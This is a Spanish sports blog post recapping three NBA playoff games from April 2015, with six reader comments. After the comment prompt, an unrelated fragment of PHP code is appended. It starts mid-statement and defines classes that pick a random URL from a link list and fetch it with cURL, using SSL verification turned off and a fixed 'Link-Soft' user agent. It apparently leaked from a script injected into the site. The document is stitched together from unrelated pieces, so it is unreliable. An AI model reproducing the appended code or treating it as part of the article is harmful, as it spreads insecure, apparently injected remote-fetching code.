La crónica: Vías rápidas

22 de April de 2015 por MagicJohnson32

Tras la disputa de los segundos partidos de sus respectivas eliminatorias, Rockets, Wizards y Celtics transitan por vías rápidas. Hay que destacar a Washington, que sale de Toronto con dos victorias y es, a día de hoy, el único equipo que ha vencido a domicilio en estos Playoffs. Hubo de hecho más emoción en Houston, donde presenciamos al buen Josh Smith y al mal Rondo, y en Cleveland, escenario de otra dignísima derrota de los Celtics.

Dallas Mavericks 99 – Houston Rockets 111

Un cruce de cables de Rondo y unos minutos de inspiración de Josh Smith le valieron a los Rockets su segunda victoria de la serie, que se trasladará a Dallas con muchas cuestiones pendientes en la pizarra de Carlisle. El técnico trató de cortar de raíz los males generados por la inexplicable actitud de Rondo, que quedó retratado repetidamente en los apenas 10 minutos que permaneció en cancha antes de ser relegado definitivamente al banquillo. Pese a la noche gris de Nowitzki y que Monta Ellis tampoco estuvo fino (11 de 37 TC entre ambos), los Mavs mantuvieron sus opciones de igualar la serie hasta que, ya en el último cuarto y con Harden en el banco, a Josh Smith se le encendió esa bombilla que con frecuencia permanece apagada y lideró un parcial de 4-19 que dejó el partido prácticamente sentenciado. Con 84-81 para los Mavs, Smith asistió en 6 de las siguientes 8 canastas de su equipo, la mayoría de ellas en alley oops a un Dwight Howard que se lució a base de completar pases de su amigo de la infancia. Con la conexión Smith & Howard a pleno rendimiento, los Rockets pusieron el marcador en un 88-100 irrecuperable para los visitantes.

MVP: Josh Smith (15 puntos, 8 rebotes, 9 asistencias, 1 robo y 1 tapón).

Washington Wizards 117 – Toronto Raptors 106

En un arranque de Playoffs en el que predominan las victorias locales, una serie presenta un panorama bien distinto. Los Wizards viajarán a Washington con la serie perfectamente encarada tras imponerse de nuevo en Toronto y poner el 2-0 en un partido marcado nuevamente por los problemas de faltas de Kyle Lowry (quien ya vio desde el banco la derrota de los suyos en la prórroga del primer encuentro) y las excelentes actuaciones del backcourt titular de Randy Wittman. Sin Lowry, quien además acabó dolido del tobillo, la defensa local volvió a hacer aguas, especialmente en transición. Así, John Wall no tuvo problemas en encontrar grietas repetidamente ya fuese para anotar o para asistir a Beal y a un Otto Porter que se está revelando como el factor X de la eliminatoria. Con Wall a las riendas, más de un 50% de acierto en tiros de campo y un dominio absoluto del rebote, los Wizards se recuperaron de un mal inicio (2-12) con un parcial de 71-44 en los dos cuartos intermedios que les condujo a un plácido final de partido.

MVP: John Wall (26 puntos, 8-16 TC, 17 asistencias).

Boston Celtics 91 – Cleveland Cavaliers 99

Hay dignidad en la derrota, y estos Celtics son la prueba. Les favorece que toda la presión en la eliminatoria recaiga sobre los Cavs, para los que todo lo que no sea despachar la serie en un máximo de 5 partidos supondría minutos y esfuerzo de más. Tal vez por eso, los Celtics volvieron a salir al Q con mejor disposición y una mayor entrega que los Cavs, y obligaron a Blatt a pedir tiempo muerto con 5-16 en el marcador. La interrupción enderezó el rumbo de los locales, que equilibraron la contienda aunque no lograron ponerse por delante hasta instantes antes del descanso. La inercia se extendió en el tercer cuarto y pareció que los Cavs sentenciarían cuando se marcharon por 14 puntos (54-68), pero a los Celtics no se les agota el aliento tan fácilmente y le dieron emoción al tramo final. Isaiah Thomas dejó la renta local en solo dos puntos pero LeBron (que superó a Jerry West como séptimo máximo anotador de la historia de los Playoffs) se encargó de neutralizar la amenaza, se combinó con Irving para anotar los 24 puntos de los Cavs en el periodo final y los Cavs viajarán a Boston con la tranquilidad que da el 2-0.

MVP: LeBron James (30 puntos, 9 rebotes, 7 asistencias, 2 tapones).

TOP 10

Y esta noche…

En la madrugada del miércoles al jueves se disputan los segundos partidos de las tres series que están 1-0. A la 1h00, los Hawks tratarán de poner el 2-0 y rebajar la confianza ganada por los Nets en el encuentro inaugural de la serie. A ver cómo maneja Budenholzer, recién nombrado Coach of the Year, su maltrecho juego interior titular. A partir de las 2h00, y con una polémica bastante tonta que implica a Batum y a los jugadores españoles, los Blazers necesitarán mucho más de lo que mostraron en el primer partido si quieren sacar algo del FedEx de Memphis. Y a las 4h30, los Clippers tienen la oportunidad de poner a los campeones contra las cuerdas. Algo se sacará Popovich de la manga para hacer que su equipo vuelva a verse superado por CP3 & Co.

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Bueno pues series que empiezan a decantarse claramente.
    En Toronto, la experiencia y la ventaja en el backourt de los Wizards están matando a unos Raptors en los que Lowry no levanta cabeza y sin su contribución el equipo se va a pique. Los de Washington con un gran Beal-Wall están desarmando a unos Raptors que mucho tendrán que cambiar para que veamos una serie larga tal como se esperaba en un principio.
    En Cleveland los Celtics hicieron otro ejercicio de lucha y buen juego para morir de nuevo en el momento decisivo ante unos Cavs muy superiores en los momentos de la verdad y que siguen jugando bajo la batuta de unos LeBron e Irving muy inspirados. En los Celtics se adivina un futuro brillante pero aún no ha llegado su hora y toda su lucha se va al traste por su poca claridad en ataque donde solo Isiah Thomas parece capaz de superar la defensa de los Cavs con buenos porcentajes. Veremos si el embrujo del Garden puede obrar un milagro o al menos servir para que ganen un partido.
    Por último los Rockets pasaron por encima de unos deslabazados Mavs. Con Rondo comido por sus demonios, Parsons lesionado y Nowitzki en el declive de su carrera, sólo Monta Ellis, Barea y un combativo Aminu mantuvieron en el partido a su equipo hasta que un iluminado Josh Smith empezó a dar asistencias a Howard para que destrozara a los de Dallas. Mucho trabajo para Carlisle si quiere revertir la tendencia de un equipo que ya viene de largo e intentar dar más guerra. Houston no ha necesitado ni grandes partidos de Harden para llevarse el 2-0 de su campo.
    Y esta noche, muchas ganas de ver si Pops y su equipo son capaces de volver de la paliza del otro día y ganar en LA…

      Citar

  2. Viva_Dirk dice:
    #2

    Partido muy igualado en Houston, al final del tercer cuarto era 80-81, pero en el último cuarto el físico pesó mucho a favor de los Rockets. Sin Parsons lo tienen realmente difícil los Mavs, pero diría que va a ser una serie larga.

      Citar

  3. Ruxixón dice:
    #3

    Tela los C’s,poniéndolo realmente complicado a Cleveland.Y ahora a Boston,con el Garden en contra y los verdes a este nivel,prueba de dureza mental para el equipo.

    Viva_Dirk:
    Partido muy igualado en Houston, al final del tercer cuarto era 80-81, pero en el último cuarto el físico pesó mucho a favor de los Rockets. Sin Parsons lo tienen realmente difícil los Mavs, pero diría que va a ser una serie larga.

    Eso se presuponía antes del inicio de los PO,lo que de que fuera una eliminatoria larga,pero contando con las gilipolleces de Rondo cuando hay que estar con todos los sentidos en estas batallas pues parece complicado.No me explico que le ha podido pasar en este plazo de 3 años para ir dinamitando su fama a este ritmo la verdad.

      Citar

  4. Triceratops dice:
    #4

    Scott Brooks despedido.

      Citar

  5. Ruxixón dice:
    #5

    Triceratops:
    Scott Brooks despedido.

    ¿No se pueden poner iconos de aplausos aquí?xDD.Ya era hora.Aún así difícil papeleta la de Presti,tiene que acertar de lleno con el entrenador que están en un año fundamental.

    Por cierto,Woj también ha señalado que Brooks entra con fuerza en la lista de posibles de Orlando y Denver.El GM de Orlando estuvo en Oklahoma con Brooks hace unos años.Para dar ese paso adelante en la carrera por el anillo se ha visto que Brooks se queda corto,pero oye,para hacer crecer a gente joven al menos tiene experiencia.Igual encaja bien en los dos equipos.

      Citar

  6. Jose Luis dice:
    #6

    Rondo y Parsons out for season…

    que mal les ha salido lo de Rondo, la verdad es que dos guards que no abren la pista como son Monta y Rondo… uf

    Cada vez más claro que los jugadores son jugadores en esquemas, sácalos de ahí y muy pocos rinden a su nivel anterior.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>